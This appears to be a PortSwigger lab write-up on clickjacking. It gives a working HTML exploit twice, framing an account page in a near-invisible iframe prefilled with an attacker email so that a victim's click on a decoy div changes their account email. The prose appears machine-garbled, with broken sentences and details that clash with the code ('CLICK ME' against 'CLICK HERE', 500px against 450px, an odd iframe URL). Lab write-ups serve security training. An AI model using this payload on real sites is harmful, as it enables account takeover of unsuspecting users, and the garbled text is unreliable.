Portsviger’s Lab Write Up: Clickjacking with Prefilled Form Input Data from URL Parameters

In this apprentice level lab, we will take advantage of the change email flow from a website that is vulnerable to clickjacking due to form filling via URL parameters.


Upon logging in with the given credentials, we see that after going to the account page, click on whatever is required to change the user’s email Update Email button and that email The input can be pre-filled by appending via url parameters. Let’s use the stationery clickjacking template to craft our exploit:

<head>
    <style>
        iframe {
             position:relative;
             width:700px;
             height:600px;
             opacity:0.1;
             z-index:2;
            }
        div {
             position:absolute;
             z-index:1;
            }
    </style>
</head>
<body>
    <div>
        CLICK HERE
    </div>
    <iframe src="https://dev.to/christianpaez/${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
    </iframe>
</body>

enter fullscreen mode

exit fullscreen mode

Here’s what this template looks like on our exploit server:

We need to modify the location of CLICK ME div tag so that it is on top Update Email Button on weak website. Note that we are setting the opacity of the iframe to 0.1 To be able to check for exploit presence and then modify the top and left css properties of the div so that when a logged in user clicks CLICK ME div on our website, they actually click on the vulnerable website’s button to update their email with whatever we set in the url parameter earlier. After setting the top property to 500px and the left property to 50px, it looks like the buttons are aligned for a successful attack. At this point, our exploit looks like this:

<head>
    <style>
        iframe {
             position:relative;
             width:700px;
             height:600px;
             opacity:0.1;
             z-index:2;
            }
        div {
             position:absolute;
             z-index:1;
             top:450px;
             left:50px;
            }
    </style>
</head>
<body>
    <div>
        CLICK HERE
    </div>
    <iframe src="https://dev.to/christianpaez/${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
    </iframe>
</body>

enter fullscreen mode

exit fullscreen mode

picture description

All we have to do is set the opacity of the iframe to 0.00001 or something similar so that it is almost invisible and sends the exploit to our victim.

Check out this article on The Art of Code: https://artofcode.tech/portswigger-lab-write-up-clickjacking-with-form-input-data-prefill-from-a-url-parameter/

Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-form-input-data-prefilled-from-a-url-parameter

Leave a Comment